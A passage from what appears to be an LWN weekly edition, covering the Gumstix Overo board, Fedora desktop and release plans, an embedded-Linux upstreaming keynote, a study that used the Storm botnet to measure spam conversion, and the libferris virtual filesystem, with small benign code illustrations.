at all may still have a lot of pages with identical contents.

		The Gumstix Overo - a miniature X Window System platform


Attendees at this year's Kernel Summit were treated to
an early prototype version of the Gumstix Overo
miniature Linux-powered CPU board on top of the Overo Buddy motherboard.
The system packs all of the functions of a desktop computer onto a
platform that is slightly larger than a credit card.


The specifications for the Overo processor board include:

A 600 MHz Texas Instruments OMAP 3503 processor.
 256 MB of DDR RAM.
 256 MB of NAND Flash RAM.
 A microSD adapter slot with a 2.0 GB memory stick.
 WiFi and Bluetooth ports.
 A USB 2.0 port.
 Stereo Audio input and output ports.
 A port for driving a graphical LCD panel.
 An assortment of Analog and Digital I/O ports.

The Overo Buddy motherboard adds even more functionality including
a digital video (DVI) controller and two more USB ports.


Upon receiving the Overo Buddy board, the only way to establish
a connection was via an emulated serial connection over
one of the USB ports using the provided USB cable, as explained
here.  This worked as advertised: it was possible to watch
the system boot up and then log into a root shell.
At this point, your author decided to try the installation of
the latest software on the removable microSD memory.
As directed by the
instructions,
the software image was downloaded and installed on the memory
using another machine and the provided microSD adapter card.
Again, this proceeded without any problems and the machine
booted with the new image.


Running the full X environment required purchasing
a USB hub, a USB keyboard and mouse, an assortment of USB cables
and a Mini DVI to DVI adapter for the monitor connection.
The Mini DVI adapter was a bit wide, and the strain relief around
the Overo Buddy's power supply connector had to be clipped off
to allow the two connectors to be plugged in at the same time.


Getting the USB cabling right was a bit of a challenge.
On the first attempt, the DVI monitor showed an X login window,
but the keyboard and mouse were not active.  Digging through
the documentation revealed the source of the problem.
The OTG USB port needed a type A cable and your author was using a
type B cable.
The Wikipedia USB
documentation was consulted, and your author used a special surface
mount soldering iron to create a tiny solder jumper between pins
4 and 5 of the Overo Buddy's micro-USB jack, simulating the correct
cable. Upon booting, the keyboard and mouse came to life.


When logging into the Overo's X Window System, one is presented with
the simple but effective
Enlightenment
window manager.
Applications include the typical collection of an
X terminal, a file manager, a text editor (gpe_edit),
the Midori
web browser, a mail client, an instant messenger client,
and a selection of four games.  Also included are the
AbiWord word processor,
the Gnumeric
spreadsheet, and basic audio record and play utilities.
A large collection of GUI-based admin tools and window system
configuration tools is available.  Both ssh and scp are also
installed on the system, so secure network connections are possible.
Unfortunately, both the audio
recorder and player froze up during basic tests, and their windows
did not go away until the system was rebooted; this appears to
be some kind of audio hardware issue.


The next step to having a functioning system would be to have
some kind of networking.  The Overo processor has built-in
802.11 wireless networking and Bluetooth, but neither of those
systems functioned.  That is a known issue with some of the
early-run prototype boards.  One still has the option of
adding USB WiFi and Ethernet boards to the Overo;
several devices are supported natively.
Once networking can be established, it should be possible to
use the network-based applications, transfer user data, and add more
application packages.


Having so much functionality in something as tiny as the Overo Buddy
board seems like an amazing technological feat.  Gumstix has
truly achieved a new milestone in the miniaturization of Linux systems.
Production versions of this system are scheduled for release in
the fourth quarter of 2008.


		Reinventing the Fedora desktop


Now that Fedora 10 is nearing completion, it is time to start looking
forward to the shape of Fedora 11.  Matthias Clasen started a discussion with a post to the
Fedora-desktop list, including a pointer to the whiteboard
where people can fill in their ideas.  The page contains some ideas
guaranteed to warm an editor's heart and a few which inspire rather less
enthusiasm. 

So what are the Fedora desktop people pondering?  Some of the ideas
include:


 Removing icons from the desktop menus.  The reasoning behind
     this change would appear to be "Windows and OS X do it that way."

 Fixing up power management.  Among other things, those posting to the
     wiki note "When the user changes the brightness, he doesn't
     appreciate if the computer turns it right back down again";
     better late than never.  Better power management also involves turning
     off blinking cursors, which would also be a welcome change.

 "Better fonts" is on the list; that seems to translate to better and
     easier ways for users to install new fonts.  There is some wondering
     about whether the current packaging system is really the best way to
     deal with fonts.

 The volume control has been singled out for special attention.  One of
     its claimed problems is the vast number of sliders which can appear
     for a complex audio device; it is true that it can become
     overwhelming.  But playing "find the hidden slider" when some audio
     source is inaudible is not a better state of affairs.  There is also a
     worrisome note to the effect that Windows has a better volume control
     because it is not removable.  So, in the future, we may have a volume
     control whether we want it or not.

 Replacing the panel altogether, along the lines of the
     ideas bashed out at the recent GNOME hackfest, is under
     consideration.  This would, of course, be a major change to the
     desktop which would not be welcomed by all users.

 Somebody has noticed that the flurry of "notification" windows can get
     a little irritating.  So different
     approaches to notifications are being considered.

 A new approach to
     system settings is also under consideration.  The idea would be to
     get away from the "preferences" and "administration" menus in favor
     of a single window with a search feature.

 There is talk of better location awareness, but it appears to be limited
     to mundane tasks like setting the time zone automatically.  It seems
     like it should be possible to set more ambitious goals in this area.

 The Fedora developers note that Ubuntu beat them to shipping a working
     "guest user" implementation.  Surely they will now contribute to
     improving that implementation, rather than making their own...right?

 Evidently users should not be asked to distinguish between hibernating
     the system (which saves memory to disk and powers off) and suspending
     (which keeps main memory powered up).  To avoid this problem, Fedora
     might implement a "hybrid suspend" which saves to disk but still keeps
     RAM energized for a fast restart.  There are a number of practical
     problems to solve in this area, not the least of which being that
     waiting for a full hibernate when you want to suspend the system
     quickly can be obnoxious.

 Fast boot is, naturally, on the list.


There is a lot more on the list - far more than the Fedora developers can
hope to implement (or even integrate) in the near future.  But the process
is a good one, and some of these ideas will certainly show up in future
Fedora releases.  With any luck at all, the Linux desktop will continue to
improve for a long time.

		NLUUG/ELCE: Embedded Linux and the community


As one of two embedded maintainers for the Linux kernel, David Woodhouse is
in an excellent position to see where the community is failing to keep up
its end of the bargain.  At the recent co-located NLUUG and Embedded Linux
conferences, his keynote on the second day made it very clear what areas he
sees that need improvement.  We fairly regularly hear about things that
companies should be doing—see the report on Harald Welte's first day 
keynote—but the community should certainly
keep an eye on its behavior as well.  In his presentation, Woodhouse notes
multiple projects that are not upstreaming their changes; he also notes things
that individuals could do to make Linux better.


He started by pointing out that "it's not entirely clear what
'embedded' means", as there are many kinds of devices that have
embedded attributes.  Things like headless, handheld, low power, small
size, limited ram, or limited persistent storage tend to be a part of the
description of embedded devices, but there is "no real definition
that I'm aware of that makes any sense".


Woodhouse then went on to see if he could define what an "embedded
maintainer" is and does.  He doesn't see the role as chasing patches to get
them included upstream; it is more of an advocate role.  Keeping an eye out
for stupidity in the kernel using Bloatwatch and other tools as well as
encouraging people—in various companies as well as in different parts
of the  
community—to work together on solutions to problems they have in 
common are all part of the job.


From Woodhouse's perspective, companies are "getting a lot
better" in terms of their Linux support.  Less promising is the
community: "We suck, really".  He looked at a number of
community embedded projects—like OpenWrt, Maemo, Moblin, and OLPC—to see how well they work with
upstream; what he found was rather discouraging.


By looking at several concrete criteria, such as how many unsubmitted local
kernel patches there were, how accessible their source is, and how old the
kernel is that the project is using, Woodhouse is judging those projects
the same way that companies are measured.  Of the four projects that he
looked at, only one, OLPC, was "mostly OK", the rest varied
from "less good" to "FAIL".


Moblin, for example, had only 23 outstanding patches, but those were against
kernel 2.6.24.  OpenWrt had a better kernel version, 2.6.27, but had 160
outstanding patches, plus an extra 425 files weighing in at 125,000 lines
of code, which prompted a "sorry!" from an OpenWrt developer
in the audience.  OLPC has just a few outstanding patches against 2.6.27.4,
while Woodhouse couldn't even find the kernel source for Maemo.


Getting work upstream is extremely important.  Running older kernels and
backporting fixes and features may seem like it saves time, but "it
never works in the long run, it's a false economy".  Woodhouse
listed the usual suspects as reasons to get things upstream: code review,
compile testing, updates for kernel API changes, and automated bug
checking.  He also mentioned the Kernel Janitors, whose efforts
are generally useful, even though they are "often a little misguided,
sometimes they don't engage their brain before sending patches".
All of these benefits only come from getting code into the mainline.


The theme of the talk is summed up in one statement: "Divergence is
pain".  Any time that your code is not current with the most recent
kernels or your patches are not making their way upstream, it should be felt
as pain because diverging from upstream will end up causing exactly that.
The pain 
may not be felt until later, but Woodhouse wants developers to recognize
the problems caused by divergence so that they are averse to it right from
the start.


Looking at the reasons why code is hoarded is instructive, he says.  One of
the reasons that is often heard, as well as Woodhouse's opinion, are summed
up in a bullet 
point on one of his slides: "too hard to write decent
code get code accepted".  Another reason is that there is
not enough time in the schedule for getting code merged.  Many "see
it as an extra part of the process after the driver is complete",
which is the wrong way to look at it.  Drivers and other features should be
shared early on the appropriate mailing list so that any problems are dealt
with near the beginning of development.


An issue related to code quality is that many times drivers are developed
for ancient versions of the kernel, but that really shouldn't be a barrier
as any "decent code will port relatively easily".  Sometimes
there is resistance to changes by the upstream developers.  An example he
noted was a feature that allowed multicast to be optionally removed from
the IPv4 networking stack.  It saved a fair amount of space for embedded
devices that did not need that functionality, but David Miller and other
networking developers were not very interested.  This is where the embedded
maintainer role can come into play as Woodhouse can step in to try to help
convince the upstream developers.


Woodhouse had specific suggestions for making the situation
better. "For a start, put everything in git trees" as it
allows others to look at and test the code.  Each feature should have its
own topic tree that gets pulled into the main tree and developers should
regularly assess the outstanding code to determine if it is ready to be
moved upstream.  Working with the upstream developers, getting them
involved, and getting them to care about the feature or driver is crucial.
In cases where a logjam develops, call on Woodhouse or Andrew Morton; they
"can't promise any miracles, but often it can help".


Something that Woodhouse would like to see more developers do is to adopt a
driver.  There are countless drivers in SourceForge and elsewhere that are
not upstream, so he suggests that folks "pick one driver, just tidy
it up and make it acceptable upstream".  Incidentally, Woodhouse is
no fan of SourceForge: "I don't think I wrote 'don't use SourceForge'
on any of the slides, but pretend that it's there".  He mentioned
the -staging tree as a possible destination for adopted drivers, though he
is skeptical of the tree, "but it exists, we should see if we can get
something from it".


Woodhouse summed up his talk with a simple statement: "We need to
work better as a community before we can point fingers at companies who
don't play nicely".  It is certainly true that the community needs
to set a good example for companies to follow.  By highlighting some of our
failures, Woodhouse has done the community a great favor; we can
and, with luck, will do better.


		Fedora release cycles: longer or shorter?


The Fedora 10 release is currently planned for November 25 - somewhat later
than had been originally intended.  Delays in Fedora releases are certainly
not unheard-of, even when the project isn't coping with a major compromise
of its fundamental infrastructure (the full story of which, it should be
noted, still has not been told).  Fedora 10 looks like it will be
worth the wait, but the project is not waiting for the release to start
thinking about its upcoming release cycles.  A couple of discussions
related to this topic provide some interesting insights into the pressures
being felt by Fedora's leadership.

A recent video review
of Fedora 10 was seen by the project as being something other than
entirely favorable.  But the biggest
complaint expressed by the project is on a different subject: credit
for work which is done by Fedora developers.  Quoting Fedora leader Paul
Frields:


	Another point that had me scratching my head was the same host
	indicating that Fedora had a lot of features that were in Ubuntu
	8.10.  This is certainly true, but the differentiator is that many
	of these features were *built* by Fedora contributors, inside and
	outside Red Hat.  It's important for us to keep emphasizing this
	fact.


Subsequent discussion indicates that a number of Fedora developers feel
that other distributions - Ubuntu in particular - are stealing Fedora's
thunder by shipping Fedora-developed improvements first.  This is not the
first time this kind of concern has been raised; it has been asserted that
Novell's behind-closed-doors XGL
work was done that way to keep Ubuntu from shipping it first.  Fedora
does not appear to be considering pulling its development from public view
- that would run counter to the project's open nature - but some other
responses are being discussed.


More than anything else, the Fedora project would like to ensure that the
world knows about the work its developers are doing.  Initiatives like the feature
list for each release help to get information out ahead of the actual
software release.  There is also talk of more aggressive blogging, outreach
to news sites, etc.  The project has even posted a proposed
marketing schedule which would help to ensure that all the right
marketing activities are happening at the right points in the release
cycle.

Former Fedora leader Max Spevack had a
different suggestion to offer:


	If "features" and "first" are hurting because of where we are in
	the calendar compared to the Ubuntu release, allowing them the
	chance to release their new distro first and to receive a lot of
	credit for new features when reviewers and press don't understand
	where the upstream work is being done (in Fedora, for example),
	then Fedora Marketing should ask the Fedora Board to think about
	altering our "May Day" and "Halloween" release targets by a little
	bit, so that Fedora's cycle finishes before Ubuntu's.


This proposal brings to mind a vision of distributors racing to be the
first to release, leading to ever-shorter cycles and a corresponding
decrease in release quality.  It is hard to imagine that the first mover
has such an overwhelming marketing advantage; there must be a better way.

It does not look like Fedora will attempt a "first post" counterattack
anytime soon.  In fact, if the recently-posted Fedora 11 release schedule proposal is
adopted, the exact opposite will happen.  In the past, Fedora has responded
to a much-delayed release by shortening the following release cycle in an
attempt to get back on schedule.  For Fedora 11, it would appear that
this will not happen; there will be no attempt to go for a "May Day"
release. 

The reasoning against shortening the Fedora 11 cycle comes down to this:


	Fedora 11 will be extremely important to Red Hat Enterprise Linux
	(otherwise known as RHEL).  RHEL 6 planning has looked to use
	Fedora 10 and Fedora 11 as releases to work out new technologies
	and features that are desired in RHEL 6.  This includes a lot of
	upstream work that is being done, and targeted to land in these two
	releases.


So a shortened Fedora 11 cycle would make it harder to get all of the
changes planned for RHEL 6 in.  That's problematic for Red Hat, and, since
Red Hat pays for much of Fedora's existence, Red Hat's problems become
Fedora's problems.  Beyond that, though, it seems that a number of core Red
Hat engineers will be working on Fedora during the next cycle to help get
features targeted at RHEL 6 into shape.  If the next cycle is shorter, Fedora
will get less attention from those developers.  Fedora would like to avoid
that situation and take advantage of the RHEL team's attention while it
can.

So the proposal is to retain the six-month cycle for Fedora 11 and release
around the beginning of June.  The Fedora 12 cycle, though, would be
shortened to get the project back to the original schedule.  The hope is
that the advance notice will make it easier to plan for a short release
cycle; Jesse Keating also suggests that the project "could even
focus more on polish issues in F12 than large sweeping features."
The more cynically-minded among us might conclude that Fedora 11 will
be stuffed full of bleeding-edge new stuff that the RHEL team wants to
evaluate, and Fedora 12 will be the release where all of that work is
actually stabilized.  But your editor would never want to be cynical.

The initial response to the proposed schedule is almost entirely positive,
so it seems likely that things will go that way.  Some Fedora developers
may feel that releasing behind Ubuntu gives the project a public relations
disadvantage, but other concerns are seen as being more important.  Since
those "other concerns" can be seen as "take the time to focus a lot of work on
pulling together new features for an upcoming stable release," this set of
priorities seems hard to argue with.

		Storm botnet used to study spam


Spam is a problem that all email users suffer from, but getting a handle on
the economics of spamming has never been easy.  A group of researchers has
changed that to some extent by publishing a study
[PDF] that looks at the conversion rate of spam emails.  While the methods
they used were somewhat ethically questionable, the data it provides is
quite useful and interesting.


In the study, the Storm botnet's "command and control" (C&C) infrastructure
was infiltrated in such a way
that spam messages sent by Storm worker nodes would point the URLs in the
spam at sites controlled by the researchers.  By doing this, they could
determine how much spam was sent and, more importantly, how much of it was
clicked on.  While sending spam is not very costly, it clearly does not
have a zero cost. This means that—unbelievable though it sometimes
seems—people actually do click through spam emails; not only that,
they actually make purchases from the sites where they land.


The researchers set up fake pharmacy
sites—selling male enhancement products amongst other things—that would be reached
via the spam links.  To protect the spam "victims", a visitor to the site
would be allowed to get to the checkout stage before being shown a site
error.  It seems
plausible that nearly everyone willing to fill their shopping cart with
such products and enter the checkout process is a very likely buyer.
In this way, the study could count not only those who followed the links,
but also those who were likely to buy.


What they found was that of 350 million emails sent—they estimate 82
million actually delivered—ten thousand recipients visited the site
for a click-through rate of 0.003%.  Of those, 28 users actually tried to
check out with products totaling over $2700.  The study was run for 26
days, so this could have resulted in roughly $100 per day of revenue. 
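
The arithmetic behind those figures can be checked in a few lines. The inputs below are the rounded numbers quoted above ("ten thousand" visits, "over $2700"), so the results are approximations rather than the study's exact values; the variable names are only illustrative.

```python
# Rounded figures as quoted in the text above.
emails_sent = 350_000_000
site_visits = 10_000
attempted_purchases = 28
total_value_usd = 2700
study_days = 26

# Percentages are relative to the number of emails sent.
click_through_pct = 100 * site_visits / emails_sent
conversion_pct = 100 * attempted_purchases / emails_sent
revenue_per_day = total_value_usd / study_days

print(f"click-through rate: {click_through_pct:.4f}%")
print(f"purchase attempts per email sent: {conversion_pct:.7f}%")
print(f"revenue per day: ${revenue_per_day:.0f}")
```

The click-through rate rounds to the 0.003% cited, and the daily figure lands just above $100.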


Also of interest were the campaigns that were run to test the propagation
of the Storm malware.  This is normally done by sending spam that directs
users to a website (via a "you have received a postcard" message) and
entices them into clicking a link that will download and install the
malware.  The percentages of click-throughs were slightly higher
(0.004-0.006%), but a rather large percentage of those (almost 10%)
actually clicked the malware link once they reached the website.  The
researchers' version would download a benign executable, but the clear
implication is that a small, but useful, number of users would actually
add themselves to the botnet more-or-less voluntarily.


While the study is quick to point out that it represents only one data
point, there is some value in extrapolating what the botnet might be able
to generate in terms of revenue: 

	Different campaigns, using different tactics and marketing
	different products will undoubtedly produce different outcomes.
	Indeed, we caution strongly against researchers using the conversion
	rates we have measured for these Storm-based campaigns to
	justify assumptions in any other context. At the same time, it
	is tempting to speculate on what the numbers we have measured
	might mean. We succumb to this temptation below, with the understanding
	that few of our speculations can be empirically validated
	at this time.


The conclusion is that something on the order of $7000-9500 per day could be
generated, which equates to $2.5-3.5 million per year—a tidy sum by any
measure.  There is some additional speculation that because of the retail
cost of 
sending spam (rumored to be something like $80 per million sent), it only
makes sense that the Storm operators and the "pharmacies" are one and the
same.  The sites used for propagation of the Storm malware have 
similarities to those used by the shopping sites, which also indicates a
close association between the two.  The study makes the following, perhaps
overly optimistic, argument:

	If true, this hypothesis is heartening since it suggests that the
	third-party retail market for spam distribution has not grown large
	or efficient enough to produce competitive pricing and thus, that
	profitable spam campaigns require organizations that can assemble
	complete "soup-to-nuts" teams. Put another way, the profit margin
	for spam (at least for this one pharmacy campaign) may be meager enough
	that spammers must be sensitive to the details of how
	their campaigns are run and are economically susceptible to new
	defenses.


The full paper is well worth a read for those interested in botnets or
spam, but there are some ethical questions to consider as well.  Is it
reasonable to use other people's computers for your research without their
consent?  There is no easy answer to that question.  The researchers
outline their argument, which boils down to "we strictly reduce
harm".  Because they are just intercepting and modifying orders that
are already 
being sent to workers, their research did not increase the amount of spam
sent, nor did it increase the work that others' computers would do.


Since the spam that they arrange to be sent is harmless—at least in
terms of selling bogus medicine or propagating malware—they have
actually reduced the number of harmful spams sent.  While their arguments
seem at least well-thought-out, it is not something that would be fun to try to
explain to a judge bent on enforcing some of the poorly-thought-out
computer crime statutes.  The researchers seem confident that their methods
will pass muster, though: "We have been careful to design experiments
that we believe are 
both consistent with current U.S. legal doctrine and are fundamentally
ethical as well."


It is difficult to see how this kind of data could be gathered without
co-opting Storm or another spam-sending botnet.  From that standpoint,
the researchers took the only path they could, and they certainly appear to
have considered the legal and ethical landscape.  While there may be a
tendency to overestimate how widely applicable the data is—which the
authors warn against—it does provide a nice look under the covers of the
botnets delivering spam to one's inbox daily.


		The libferris virtual filesystem


The Unix mantra "everything is a file" gives you great flexibility
over where you store your data and how information is manipulated and
replicated. Unfortunately, many things in Unix and Linux are not
files, or at least not files that you would want to interact with directly. For example,
a PostgreSQL database is ultimately stored in a collection of binary
files though you probably wouldn't want to interact with those files
directly. Instead of storing settings in a collection of tiny files,
many applications use XML to store settings in a single file but then
have to deal with parsing XML instead of just reading little files.
libferris lets you mount both PostgreSQL and XML and provides you with
a useful way to interact with the data contained in both as a virtual
filesystem.


Other operating systems like Plan 9 pushed the
envelope further than Unix, making more things "just a file". Unfortunately,
to use Plan 9 you had to abandon your trusty old Unix roots and jump to
an entirely new operating system.


I started the libferris virtual
filesystem project back in 2001 to push the "everything is a file"
concept further, with everything implemented on a Linux base.
Libferris is a virtual filesystem
implemented as a shared library with
FUSE bindings.
Because FUSE is
already in the Linux kernel you don't have to do any kernel patching
to use libferris. Because libferris is a shared library and not in the
kernel, it can use other libraries to help it mount data sources like
XML, relational databases and Emacs to name a few. And as an upshot of
being out of kernel, I can work on letting libferris mount anything I
like no matter how strange it might be without any third party
approval.


There are actually two ways to use libferris -- through a native C++
interface and using the normal Unix APIs with FUSE. The FUSE interface is
very useful if you want to rsync(1) some structured information from
an XML file into a PostgreSQL database. Just mount them both with FUSE
and rsync away. A few other interesting things you can do with the
FUSE interface are exposing data as a virtual office
document, using XSLT stylesheets that libferris processes for you,
and geotagging with Google
Earth.


The design of libferris revolves around two primitives: exposing file contents as C++
std::iostreams, and rich metadata support through an interface similar
to Extended Attributes (EA) attr_get(3).  Over time,
libferris has gained sophisticated support for indexing both the full
text contents of files and their metadata. Libferris is written in C++ and aims to take full advantage of the
language.  Interfaces are designed to be as easy to pick up for C++
programmers as possible; for example, displaying a directory can be
done using iterators, find(), begin(),
end(), etc.


Both the types of things that libferris can provide as virtual
filesystems and the metadata handling are done through a plugin
interface. The handling of metadata is done through the Extended
Attributes (EA) interface.  This EA interface is also virtualized --
if you write an attribute to file:///foo/bar and the kernel
filesystem supports extended attributes, then the value will be saved
in a kernel level EA using attr_set(3). On the other hand if
file:///foo/bar happens to exist on a network filesystem that
does not support EA, then your value is saved in RDF by libferris. In
both cases the value can be read again using an identical interface.
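
The fallback behavior described above can be sketched in Python. This is not libferris code: the AttributeStore class is hypothetical, and a JSON side file stands in for the RDF store, purely to keep the example self-contained. The only real calls used are os.setxattr() and os.getxattr(), which exist on Linux builds of Python.

```python
import json
import os
import tempfile


class AttributeStore:
    """Hypothetical helper: kernel xattrs when available, a JSON side file otherwise."""

    def __init__(self, side_file):
        self.side_file = side_file

    def _load(self):
        if os.path.exists(self.side_file):
            with open(self.side_file) as f:
                return json.load(f)
        return {}

    def set(self, path, name, value):
        try:
            os.setxattr(path, "user." + name, value.encode())
            return "kernel"
        except (AttributeError, OSError):
            # No os.setxattr on this platform, or the filesystem refused it.
            data = self._load()
            data.setdefault(os.path.abspath(path), {})[name] = value
            with open(self.side_file, "w") as f:
                json.dump(data, f)
            return "fallback"

    def get(self, path, name):
        # Same call for the reader regardless of where the value was stored.
        try:
            return os.getxattr(path, "user." + name).decode()
        except (AttributeError, OSError):
            return self._load()[os.path.abspath(path)][name]


with tempfile.TemporaryDirectory() as tmp:
    target = os.path.join(tmp, "bar")
    open(target, "w").close()
    store = AttributeStore(os.path.join(tmp, "attributes.json"))
    backend = store.set(target, "rating", "5")
    value = store.get(target, "rating")
    print(backend, value)
```

Which backend is reported depends on the filesystem holding the temporary directory; the value read back is the same either way.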


Looking at filesystems in an abstract way -- a hierarchy of files,
file contents, and metadata associated with files and directories as
key-value pairs -- there is somewhat of a resemblance to the data
model of XML. There are obvious differences, though: XML elements can
have multiple text nodes as contents, an XML element does not need to
have specific unique names for each child XML element and so on. In
many cases it can be advantageous to smooth over the differences and
view a filesystem as XML and vice versa. Over the years libferris has
gained the ability to interact with its virtual filesystems as
virtual Document Object Models (DOMs). The reverse is also true: you
can take a xerces-c DOM and interact with it as a virtual
filesystem. Using virtual DOMs makes it easy to create a view of a
filesystem using a browser and XSLT. See xml.com
for information on using XQuery against a libferris virtual
filesystem.
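
To make the resemblance concrete, here is a small Python sketch that walks a directory and builds an XML tree from it using the standard xml.etree module. It does not use libferris or its virtual DOM; the element names ("dir", "file") and the choice to store file contents as element text are assumptions for the example, and it only suits small text files.

```python
import os
import tempfile
import xml.etree.ElementTree as ET


def directory_to_xml(path):
    """Build an XML element for `path`; directory entries become child elements."""
    name = os.path.basename(os.path.normpath(path))
    if os.path.isdir(path):
        element = ET.Element("dir", name=name)
        for child in sorted(os.listdir(path)):
            element.append(directory_to_xml(os.path.join(path, child)))
    else:
        # Metadata becomes XML attributes, file contents become the text node.
        element = ET.Element("file", name=name, size=str(os.path.getsize(path)))
        with open(path, errors="replace") as f:
            element.text = f.read()
    return element


with tempfile.TemporaryDirectory() as tmp:
    os.mkdir(os.path.join(tmp, "docs"))
    with open(os.path.join(tmp, "docs", "note.txt"), "w") as f:
        f.write("hello")
    tree = directory_to_xml(os.path.join(tmp, "docs"))
    xml_text = ET.tostring(tree, encoding="unicode")
    print(xml_text)
```

Once the hierarchy is in this form, ordinary XML tooling such as XPath-style lookups or an XSLT processor can be pointed at it.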


The ability to mount XML and Berkeley db4 data as filesystems has long
been a part of libferris. If you want to store a filesystem inside a
platform independent format, then using XML is great, whereas the speed
of individual file look up in a Berkeley db4 database of many many
file records can come in handy.  Each format has its advantages, but
they are all just virtual filesystems as far as libferris is
concerned.


When a filesystem can offer what it likes through key-value pairs (EA)
associated with files, relational databases can also be viewed as a
virtual filesystem.  Databases, views, tables and result sets become
directories, tuples become files named by the value of their primary
key, and the individual values of tuples are exposed as Extended
Attributes on their tuple file. Again, PostgreSQL appears just like
another virtual filesystem. For relational data there are a few
caveats; for example, to create a new "file" in a table you must
supply at least the primary key EA as well as any EA which are
explicitly marked "not null" in the database.
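
The mapping from tables and tuples to directories and files can be illustrated with Python's built-in sqlite3 module. SQLite is used here only as a stand-in for PostgreSQL so the example runs anywhere; the function names and the users table are hypothetical and are not part of libferris.

```python
import sqlite3


def list_tables(conn):
    """Tables play the role of directories."""
    rows = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name"
    )
    return [name for (name,) in rows]


def list_tuple_files(conn, table, key):
    """Each tuple is a 'file' named by its primary key; columns become attributes."""
    # Table and column names are interpolated directly; acceptable for a demo only.
    cursor = conn.execute(f"SELECT * FROM {table} ORDER BY {key}")
    columns = [d[0] for d in cursor.description]
    files = {}
    for row in cursor:
        attributes = dict(zip(columns, row))
        files[str(attributes[key])] = attributes
    return files


def create_tuple_file(conn, table, attributes):
    """Creating a 'file' is an INSERT; missing NOT NULL attributes are rejected."""
    names = ", ".join(attributes)
    marks = ", ".join("?" for _ in attributes)
    conn.execute(f"INSERT INTO {table} ({names}) VALUES ({marks})",
                 list(attributes.values()))


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, email TEXT)")
create_tuple_file(conn, "users", {"id": 1, "name": "alice", "email": "alice@example.com"})
create_tuple_file(conn, "users", {"id": 2, "name": "bob"})

try:
    create_tuple_file(conn, "users", {"id": 3})  # no value for the NOT NULL column
    rejected = False
except sqlite3.IntegrityError:
    rejected = True

files = list_tuple_files(conn, "users", "id")
print(list_tables(conn), sorted(files), files["2"], rejected)
```

The failed third insert mirrors the caveat above: a new "file" cannot be created without the attributes the table marks as "not null".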


Libferris will automatically mount many filesystems for the user. For
example, if you try to read an XML file as though it is a directory
then libferris will implicitly mount it as one for you. This does blur
the lines between what is a directory and what is a file in the
system. There is some additional metadata that libferris makes
available if you would like to avoid the automatic mounting. For
example, if you do not wish to descend into XML files, then read the
is-file metadata and, if it is true, do not attempt to descend into the
file.


One of the motivations for creating libferris as a project of its own
was to be able to expose as a filesystem anything that I felt could be
interacted with in an interesting manner that way. So libferris can
mount some things that folks might not think of as filesystems --
including Firefox, Emacs, DBus, LDAP, Evolution, Amarok, klipper, xmms,
the X Window System and gphoto2.


The metadata plugins for libferris currently support extracting
information from file formats automatically, for example, EXIF, XMP
and ID3 tags. Metadata overlays are also supported, so you can see
what tags you have associated with an image in f-spot through extended
attributes in libferris. I use the term overlays because a central
repository of tag data (in this case from f-spot) is scattered over an
entire filesystem in libferris. The lower level metadata plugins
handle more standard extended attributes usage, for example using
attr_set(3) to store values or saving them in RDF.


Many of the standard utilities have been rewritten to use the native
libferris API and take advantage of extra features it offers. Things
like ls, cp, mv, rm, cat, io-redirection, touch, head and tail all
have native libferris versions which are shipped with the main
tarball. These all also serve as code samples for how to use the
libferris API. Extensions to the normal clients include the ability to
output directory listings in XML for ferrisls, while ferriscp can use
memory mapped IO as well as the more standard open(), read() and
write() calls to perform the copy. When memory mapped IO is used,
ferriscp also makes the madvise(2) MADV_SEQUENTIAL call to let the
kernel select an appropriate caching policy.
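
As a rough illustration of the memory mapped copy described above, here is a minimal C sketch. It is not taken from ferriscp; the function name copy_file_mmap() and its error handling are assumptions made for the example, and only the standard mmap(2), madvise(2) and write(2) calls are used.

```c
#define _DEFAULT_SOURCE   /* expose madvise() under strict compiler modes */
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not part of libferris: copy src to dst by mapping
 * the source file and hinting that it will be read sequentially.
 * Returns 0 on success, -1 on failure. */
int copy_file_mmap(const char *src, const char *dst)
{
    assert(src != NULL && dst != NULL);

    int in = open(src, O_RDONLY);
    if (in < 0)
        return -1;

    struct stat st;
    if (fstat(in, &st) < 0) {
        close(in);
        return -1;
    }

    int out = open(dst, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (out < 0) {
        close(in);
        return -1;
    }

    int rc = 0;
    if (st.st_size > 0) {              /* mmap() rejects zero-length maps */
        size_t len = (size_t)st.st_size;
        void *map = mmap(NULL, len, PROT_READ, MAP_PRIVATE, in, 0);
        if (map == MAP_FAILED) {
            rc = -1;
        } else {
            /* Purely advisory: if the hint fails the copy still works. */
            (void)madvise(map, len, MADV_SEQUENTIAL);

            const char *p = map;
            size_t left = len;
            while (left > 0) {
                ssize_t n = write(out, p, left);
                if (n < 0) {
                    if (errno == EINTR)
                        continue;      /* interrupted, retry the write */
                    rc = -1;
                    break;
                }
                p += n;
                left -= (size_t)n;
            }
            munmap(map, len);
        }
    }

    if (close(out) < 0)
        rc = -1;
    close(in);
    return rc;
}
```

A caller would simply check the result of copy_file_mmap("in.dat", "out.dat"). The hint tells the kernel that pages will be touched in order, so it can read ahead aggressively and drop pages behind the reader sooner.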


The indexing support in libferris is also handled using plugins. Two
different indexing plugin types exist: full text and metadata.  There
are two types of plugin because the strategy for how to create an
index can be quite different depending on whether you are performing a
search for some words in a document text or wish to find files
with certain metadata values. Using inverted files can be great for
resolving a ranked full text query for "alice wonderland" but finding
all files in either my home directory or /pictures that have
been modified in December 2008 can be solved in a number of ways.


There are currently indexing plugins for CLucene, Lucene, LDAP,
federations of other libferris indexes, ODBC, PostgreSQL, Redland
(RDF), Xapian, Beagle, Strigi and some custom designs. There are
likely to be more index plugins explicitly designed to work on NAND
Flash in the future. Those interested in indexing and libferris should
see this article.


A major advantage of closely combining the index and search operations
into the virtual filesystem is that anything the virtual filesystem
can see can be indexed.  When searches are performed you should also
be able to interact with any of the results as a virtual
filesystem. This avoids the issue where a discrete search library
might return a URL that the client cannot do anything with.


So, what does it look like to code using libferris? Most objects in
ferris are smart pointers, many using intrusive reference
counting. The type for such objects is prefixed with "fh_" to indicate
a ferris handle. The notion of files and directories is amalgamated
into a single "Context" abstraction.  To get a smart pointer to a
filesystem path the Resolve() function is used.  So without
further ado, to get a file and its metadata with libferris:


Libferris is steadily gaining commercial interest. Currently I provide
things like custom builds of libferris, explicit support for new test
cases in the core regression test suite that are important to clients
and of course extensions to libferris to perform a specific task that
might be desired.


